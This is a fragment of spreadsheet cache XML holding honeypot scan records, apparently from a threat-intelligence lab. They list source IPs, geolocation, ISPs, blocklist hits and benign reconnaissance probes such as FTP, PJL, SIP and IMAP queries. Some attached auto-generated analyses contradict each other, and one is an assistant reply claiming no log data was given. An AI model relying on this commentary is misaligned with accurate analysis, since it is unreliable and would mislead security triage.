    <d v="2025-04-30T10:10:30"/>
    <n v="636"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;2419&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="06"/>
    <s v="Ankara"/>
    <s v="Çankaya"/>
    <s v="Ankara"/>
    <s v="323786"/>
    <s v="NA"/>
    <s v="39.9014"/>
    <s v="32.8121"/>
    <s v="7155"/>
    <s v="ViaSat,Inc."/>
    <s v="ESER-TOOWAY"/>
    <s v="business"/>
    <s v="Eser Telekom A.S."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d432:398f"/>
    <s v="None&amp;&amp;C-I_D&amp;&amp;C-U"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="205"/>
    <x v="205"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:29"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T10:10:29"/>
    <n v="124"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;39009&amp;&amp;9968&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="24"/>
    <s v="Silesia"/>
    <s v="Sosnowiec"/>
    <s v="Sosnowiec"/>
    <s v="3085128"/>
    <s v="NA"/>
    <s v="50.2868"/>
    <s v="19.1038"/>
    <s v="197181"/>
    <s v="NETICO S.C."/>
    <s v="Netico S.C."/>
    <s v="business"/>
    <s v="Netico S.C."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2d9:dab7"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="206"/>
    <x v="206"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:09"/>
    <d v="2025-02-18T15:56:59"/>
    <d v="2025-04-30T10:10:09"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="3389&amp;&amp;8443&amp;&amp;23&amp;&amp;443&amp;&amp;NA&amp;&amp;110"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '103.211.202.140:8443', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA&amp;&amp;{Data_POP3:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b0bc"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="207"/>
    <x v="207"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:08:25"/>
    <d v="2025-04-26T12:16:53"/>
    <d v="2025-04-30T10:08:25"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Bulandshahr"/>
    <s v="Shikārpūr"/>
    <s v="1256532"/>
    <s v="203395"/>
    <s v="28.2798"/>
    <s v="78.011"/>
    <s v="135255"/>
    <s v="Agrawal Technology Solutions"/>
    <s v="Agrawal Technology Solutions"/>
    <s v="business"/>
    <s v="Agrawal Technology Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d3:bc8a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible malicious login attempt via telnet service, as data is missing or unavailable for telnet connections. No activity detected but potential security risk exists if left unmonitored. &amp;&amp; This log suggests a potential attempt to connect via TELNET, but was unable to be completed. The lack of successful connection may indicate an anomaly or blockage by security measures. No further activity was detected on this service. &amp;&amp; No TELNET activity detected, which may indicate that an attacker attempted to access or scan the system for vulnerabilities related to this service. The absence of TELNET traffic could be a sign of a reconnaissance attempt or probing for potential entry points. No meaningful data was exchanged through TELNET."/>
    <m/>
  </r>
  <r>
    <x v="208"/>
    <x v="208"/>
    <s v="NA&amp;&amp;practical.monitoring.internet-measurement.com"/>
    <x v="0"/>
    <d v="2025-04-30T10:01:51"/>
    <d v="2024-12-11T19:19:24"/>
    <d v="2025-04-30T10:01:51"/>
    <n v="234"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_IRC_H44&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_SIP_H44&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_POSTGRES_H3&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_SOCKS5_H40"/>
    <s v="110&amp;&amp;5432&amp;&amp;9100&amp;&amp;6379&amp;&amp;6667&amp;&amp;NA&amp;&amp;389&amp;&amp;21&amp;&amp;3306&amp;&amp;443&amp;&amp;143&amp;&amp;1080&amp;&amp;1521&amp;&amp;5900&amp;&amp;58835&amp;&amp;445&amp;&amp;25&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'spamrbl.imp.ch': ['unknown']}"/>
    <n v="140"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.231,48275)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.231,58513)}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'bjhfiuio', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.231;tag=bjhfiuio', 'max-forwards': '0', 'to': 'sip:95.164.21.98', 'via': 'SIP/2.0/UDP 185.247.137.231:5060;branch=z9hG4bKbjhfiuio;received=185.247.137.231;rport=57901'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 122.170.7.108:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9f7:89e7"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity is attempted IMAP access without providing credentials or performing any legitimate action. This could be an attempt to scan for vulnerable services or exploit login vulnerabilities. The absence of expected behavior suggests a potential security threat. &amp;&amp; The system is being probed for Redis service, likely an attempt to exploit potential vulnerabilities or scan for sensitive data stored in memory. This could be a reconnaissance or scouting activity by malicious actors. It may also indicate a targeted attack on the system's database management capabilities."/>
    <m/>
  </r>
  <r>
    <x v="209"/>
    <x v="209"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T09:47:37"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T09:47:37"/>
    <n v="145"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;7566&amp;&amp;53&amp;&amp;7065&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Salem"/>
    <s v="Salem"/>
    <s v="1257629"/>
    <s v="636007"/>
    <s v="11.6643"/>
    <s v="78.146"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Bharti Airtel Ltd"/>
    <s v="2010-02-17"/>
    <s v="CHCK-3230153-Salem"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (182.76.208.221,62335)}&amp;&amp;{Data_SMB:Incoming connection (182.76.208.221,49393)}&amp;&amp;{Data_SMB:Incoming connection (182.76.208.221,50043)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b64c:d0dd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="210"/>
    <x v="210"/>
    <s v="ip-104-193-59-142.user.start.ca&amp;&amp;NA"/>
    <x v="1"/>
    <d v="2025-04-30T09:36:20"/>
    <d v="2023-07-24T19:25:53"/>
    <d v="2025-04-30T09:36:20"/>
    <n v="1848"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_NTP_H20&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;123&amp;&amp;389&amp;&amp;22&amp;&amp;5900&amp;&amp;9100&amp;&amp;80&amp;&amp;443&amp;&amp;1080&amp;&amp;445&amp;&amp;29419&amp;&amp;NA&amp;&amp;49630&amp;&amp;44750"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="ON"/>
    <s v="Ontario"/>
    <s v="Middlesex County"/>
    <s v="London (Central London)"/>
    <s v="6058560"/>
    <s v="N6A"/>
    <s v="42.9826"/>
    <s v="-81.2495"/>
    <s v="40788"/>
    <s v="Start Communications"/>
    <s v="Start Communications"/>
    <s v="residential"/>
    <s v="Start Communications"/>
    <s v="2014-09-16"/>
    <s v="START-CABLE-R4"/>
    <s v="2014-12-17"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2000-10-31 16:55:37"/>
    <s v="2029-12-29 05:00:00"/>
    <s v="2024-01-02 16:29:55"/>
    <s v="['ns1.start.ca', 'ns2.start.ca']"/>
    <s v="MarkMonitor International Canada Ltd."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']"/>
    <s v="NA"/>
    <x v="5"/>
    <s v="['+1.2083895740', '+1.6478370955']"/>
    <s v="NA"/>
    <s v="::ffff:68c1:3b8e"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="211"/>
    <x v="211"/>
    <s v="NA"/>
    <x v="2"/>
    <d v="2025-04-30T09:36:01"/>
    <d v="2023-12-06T00:17:00"/>
    <d v="2025-04-30T09:36:01"/>
    <n v="332"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23&amp;&amp;45151&amp;&amp;NA&amp;&amp;45765&amp;&amp;51610&amp;&amp;51609"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="Arada"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02427"/>
    <s v="38.7519"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2015-10-12"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4bc:50f0"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious TELNET activity detected, as the status is marked as &quot;Not Available&quot;. This suggests that either there was no attempt to connect or the connection was successfully dropped. No malicious action occurred. &amp;&amp; This log indicates that no malicious activity has been detected or recorded."/>
    <s v="I don't see any log data provided to analyze. Please provide the log data, and I'll be happy to assist you with naming the type of attack based on the information available."/>
  </r>
  <r>
    <x v="212"/>
    <x v="212"/>
    <s v="NA"/>
    <x v="3"/>
    <d v="2025-04-30T09:28:55"/>
    <d v="2025-03-23T11:14:16"/>
    <d v="2025-04-30T09:28:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="05"/>
    <s v="Bicol Region"/>
    <s v="Camarines Norte"/>
    <s v="Malasugui"/>
    <s v="1703005"/>
    <s v="NA"/>
    <s v="14.1439"/>
    <s v="122.847"/>
    <s v="132199"/>
    <s v="Globe Telecom Inc."/>
    <s v="Globe Telecom"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="2009-02-12"/>
    <s v="GBB-VISAYAS-IP-POOL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c6:c8bf"/>
    <s v="C-I&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="213"/>
    <x v="213"/>
    <s v="NA"/>
    <x v="4"/>
    <d v="2025-04-30T09:26:05"/>
    <d v="2025-03-22T03:35:45"/>
    <d v="2025-04-30T09:26:05"/>
    <n v="63"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="NA"/>
    <s v="Tehrān (District 3)"/>
    <s v="6683528"/>
    <s v="NA"/>
    <s v="35.7838"/>
    <s v="51.4361"/>
    <s v="205647"/>
    <s v="PARDIS FANVARI PARTAK LTD"/>
    <s v="SHATEL"/>
    <s v="business"/>
    <s v="SHTL-NET-DED"/>
    <s v="2012-03-02"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2594:d55"/>
    <s v="C-I&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="214"/>
    <x v="214"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T09:21:17"/>
    <d v="2024-04-02T06:33:00"/>
    <d v="2025-04-30T09:21:17"/>
    <n v="298"/>
    <s v="SQTK_GTDN"/>
